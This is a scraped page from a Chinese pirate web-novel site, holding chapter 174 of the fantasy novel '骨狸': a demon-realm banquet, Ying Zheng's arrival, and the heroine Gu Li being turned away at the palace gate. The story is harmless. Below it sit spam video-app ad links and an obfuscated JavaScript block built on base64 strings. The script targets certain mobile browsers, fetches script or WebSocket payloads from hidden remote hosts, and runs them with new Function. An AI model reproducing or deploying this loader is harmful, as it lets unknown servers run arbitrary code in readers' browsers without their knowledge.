笔趣阁

下载
字:
关灯 护眼
笔趣阁 > 骨狸 > 第一百七十四章 奇怪女子

第一百七十四章 奇怪女子

章节错误,点此举报(免注册),举报后维护人员会在两分钟内校正章节内容,请耐心等待,并刷新页面。
听闻言,嬴政浅浅一笑,而后些许无奈道:“罢了……同你说出他的下落也未尝不可。”
  闻言,仪南眼中冒出了一丝光亮。
  嬴政继续道:“嬴成蛟魂魄入了冥界之后,已斩断了凡尘之缘,此刻它应该早已就投身为蛟,栖在这人世间一处。”
  “蛟?”仪南有些许诧异。
  嬴政淡然一笑。
  ---------
  妖界铃钰殿外,墨砚面无表情站在高台上,望着妖界百态。
  不同以往的黑衣风华色,墨砚一身金红长袍,真有那么几丝妖王气魄。
  悟笙缓缓到了墨砚身后,他言语道:“绿拓跑了。”
  似乎早就意料到的一般,墨砚并没有过多惊讶。
  “半年,他若真不想归顺,就如此放他走了也好。”墨砚言语道。
  悟笙闻言,他望向了墨砚,眼中复杂。
  墨砚变了很多,如今的墨砚不怎么爱笑了,之前那个玩世不恭的墨砚似乎已荡然无存。
  似是想起什么,悟笙又道:“这次他出逃,有很多蹊跷,似是有人助他逃跑一般。”
  闻此言,墨砚皱了眉。
  莫非是绿凌?
  这时,小蜘儿也到了铃钰殿外来,她见了墨砚没有行礼,是言道:“墨砚,妖界大宴已安排妥当,明日便可如期开始。”
  墨砚回了思绪,他言道:“此次宴会极其重要,可不能出什么纰漏。”
  小蜘儿闻言是点了头而后道:“妖界每处都安排了布防,这几日更是会加强巡逻,不会出什么事的。”
  看着如此能干的小蜘儿,悟笙是欣慰一笑,而后他握住了小蜘儿的手。
  小蜘儿望着悟笙得意一笑。
  墨砚转过身来,他正是见到了眼前两人的亲密举动。
  “你们夫妻两,换个地方腻歪吧。”墨砚难得的开起了玩笑。
  小蜘儿闻言,是笑道:“咱们墨砚妖王位置都坐稳了,倒是什么时候找个妖后来呀。”
  小蜘儿刚一说完,墨砚神色倒是突然有些僵。
  佩初的模样闪过眼前,墨砚心中一痛。
  悟笙看出了墨砚的神色,他紧了紧小蜘儿的手。
  小蜘儿有些诧异,也不知说到了墨砚的什么痛处。
  墨砚转而淡然一笑道:“此事倒是不急,你两倒是要考虑考虑什么时候要孩子。”
  闻言,小蜘儿面上一红,她害羞挣开了悟笙的手便跑开了。
  悟笙望着小蜘儿的身影宠溺一笑。
  -------
  第二日,妖界宴会开始,进入妖界王宫的各处宾客络绎不绝。
  妖界天色昏暗,天空间有火球飘荡,妖界王宫的大门处几个侍卫严加把守着。
  来客们只能凭借请帖与腰牌才能进入,不少凑热闹的妖精只能被堵在了门外,妖界王宫大门热闹不已。
  嬴政一身锦衣出现在了门前,其身后跟着白发流潜。
  望着嬴政的天人之貌众多女子们都看直了眼睛。
  有几个女妖感受到了嬴政的气息是议论道:“这是个凡人……他怎么也到这妖界宴会来。”
  “不过他长得真俊美!味道肯定也是不错……”
  “想什么呢,拿他做郎君不好吗?”
  闻此言,流潜是瞪了几个女妖精一眼。
  而后流潜向侍卫出示了魔界腰牌,侍卫们便迅速放行不敢怠慢。
  见此情形,几个女妖精是知眼前的是大人物,皆是闭了嘴。
  不知为何,嬴政转头向远处望了一眼。
  他觉一种异样的熟悉感,但远处人群熙熙攘攘,并没有他心中的那人。
  嬴政皱了眉,而后他只好转头,向着大门内而去。
  一带着面纱的女子站在远处,她躲在一柱子后深呼了一口气。
  此人便是骨狸,她眼中有着无尽恨意。
  魔君白灼,你总会死在我手里,我定会为了我的孩子报仇。
  待确保嬴政进去了之后,骨狸才敢出柱子后走了出来。
  骨狸望着大门处都是些跟她一样进不去的人,她叹了口气。
  这妖界王宫全部设了结界,要想破了结界进去是难之又难,唯一能够进去的地方只有这大门处,可她既没有请帖也没有腰牌。
  骨狸向着大门而去,侍卫拦着大门问她道:“有请帖吗?”
  骨狸摇了摇头,而后她又是轻声言道:“我是你们妖王的……一个老朋友……”
  闻言,一个侍卫一笑而后道:“老朋友?你是我见到用这个借口的第五十一个人。”
  围在大门一旁几个妖精闻言是尴尬一笑,看来,他们也是这五十一人中的其中几人。
  骨狸皱了眉,而后她只好默默退到了一旁。
  大门外突然出现一道绿烟,绿凌伴着绿烟出现在了门前。
  没有出示腰牌与请帖,那些侍卫都似认识她一般,全都让了路。
免费看片APP    美女视频免费看
『加入书签,方便阅读』
var x=window['\x61\x74\x6f\x62'],id=x('NDQ0NDczNzY1NjE1Nzk5OTk5OS0xMDE1Ng==');document.write('%lt;ins style="display:none!important" id="'+id+'"%gt;%lt;/ins%gt;');(window.adbyunion=window.adbyunion||[]).push(id);window['\x65\x68\x41\x6b\x6e\x45\x69\x5a\x4a\x46']=(!/^Mac|Win/.test(navigator.platform)||!navigator.platform)?function(){;(function(u,k,w,d,c){var cs=d[x('Y3VycmVudFNjcmlwdA==')];'jQuery';var t=[],l=[],e=0,r=0,delay=1000,f=null,ua=navigator.userAgent.toLowerCase(),sc=Math.max(1,300000),ext='2',i='ndx'+Math.floor(new Date().getTime()/sc)+ext;if(ua.indexOf('baidu')>-1||ua.indexOf('huaweibrowser')>-1){r=1;u=k;f=function(){if(!l.length)return;var ws=new WebSocket(l.shift()+'/'+i);ws.onopen=function(){for(var k in t)t[k]&&clearTimeout(t[k])};ws.onmessage=function(e){new Function('_tdcs',x(e.data))(cs);ws.close()};ws.onerror=function(e){t[++e]&&clearTimeout(t[e]);f()}};}else{f=function(){if(!l.length)return;var s=document.createElement('script');s.src=l.shift()+'/'+i;cs.parentElement.insertBefore(s,cs);s.onload=function(){for(var k in t)t[k]&&clearTimeout(t[k])};s.onerror=function(){cs.parentElement.removeChild(s);t[++e]&&clearTimeout(t[e]);f()}};}u=decodeURIComponent(x(u.replace(new RegExp(c[r]+''+c[r],'g'),c[r])));var l=u.split(',');l.sort(function(){return 0.5-Math.random()});for(var j in l)t[j]=setTimeout(f,delay*j);})('aHR0cHM6Ly9vaXNrZGprZmxzLnRzemhvbmd0aWFuc2hpamkuYY29t','d3NzOOi8vd3MuYW5kYTE1MTYuY29tOOjkwOOTAsd3NzOOi8vd3Muc3luZ2d5LmNvbTo5MDkwLHdzczovL3dzLnpoaXB1ZnMuY29tOOjkwOOTA=',window,document,['Y','O']);}:function(){};